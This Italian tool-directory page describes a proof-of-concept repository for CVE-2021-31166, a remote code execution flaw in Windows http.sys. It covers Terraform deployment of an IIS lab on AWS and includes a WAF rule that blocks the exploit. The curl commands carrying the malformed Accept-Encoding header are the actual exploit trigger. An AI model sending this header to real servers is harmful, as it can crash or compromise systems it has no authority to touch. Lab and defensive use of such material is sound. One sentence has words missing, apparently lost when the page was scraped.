Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Strumenti/GitHubGitHub/bgsilvait/win-cve-2021-31166
Analisi delle VulnerabilitàExploitEvasione IDS/IPSSicurezza WebSicurezza CloudDevSecOps
GitHubbgsilvait/win-cve-2021-31166

WIn-CVE-2021-31166

Proof-of-concept per CVE-2021-31166 (RCE su http.sys) con deployment Terraform su AWS, inclusi script di test e una regola WAFv2 per bloccare l'exploit.

Vedi Repository
25 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

WIn-CVE-2021-31166

Questo Repo è ispirato a 0vercl0k per una prova di concetto per CVE-2021-31166 ("Vulnerabilità di esecuzione remota di codice nello stack del protocollo HTTP"), un uso dopo libero (use-after-free) in http.sys corretto da Microsoft a maggio 2021.

Infrastruttura di Build

root@kitploit:~
git clone https://github.com/bgsilvait/WIn-CVE-2021-31166.git
cd WIn-CVE-2021-31166
terraform init
terraform plan
terraform apply --auto-approve

Il terraform creerà un'istanza EC2 con Windows Server Core 20H2, installerà IIS e aggiungerà le autorizzazioni SSM per aprire una Sessione Web Powershell dalla Console AWS. Creerà anche un e userà l'istanza come target. Per impostazione predefinita, il aggiungerà solo come consentito per l'accesso su .

Application Load Balancer
Security Group
IL TUO IP
HTTP

Ottieni valori

root@kitploit:~
#Define Values from Terraform Output
ALB=$(terraform output -raw lb_dns_name)
EC2IP=$(terraform output -json public_ip | jq -r '.[0]')

Testare la connettività

root@kitploit:~
#Testing to ALB
while true; do curl -I $ALB --connect-timeout 1 ; done

#Testing Directly to EC2'
while true; do curl -I $EC2IP --connect-timeout 1 ; done

Iniettare l'header CVE

root@kitploit:~
#Testing to ALB
curl -i $ALB -H "Accept-Encoding: doar-e, ftw, imo, ,"

#Testing Directly to EC2'
curl -i $EC2IP -H "Accept-Encoding: doar-e, ftw, imo, ,"

Regola per AWS WAFv2 per bloccare

root@kitploit:~
{
  "Name": "cve-block",
  "Priority": 0,
  "Statement": {
    "ByteMatchStatement": {
      "SearchString": "doar-e, ftw, imo, ,",
      "FieldToMatch": {
        "SingleHeader": {
          "Name": "accept-encoding"
        }
      },
      "TextTransformations": [
        {
          "Priority": 0,
          "Type": "NONE"
        }
      ],
      "PositionalConstraint": "EXACTLY"
    }
  },
  "Action": {
    "Block": {
      "CustomResponse": {
        "ResponseCode": 418,
        "CustomResponseBodyKey": "418"
      }
    }
  },
  "VisibilityConfig": {
    "SampledRequestsEnabled": true,
    "CloudWatchMetricsEnabled": true,
    "MetricName": "cve-block"
  }
}
Scarica lo strumento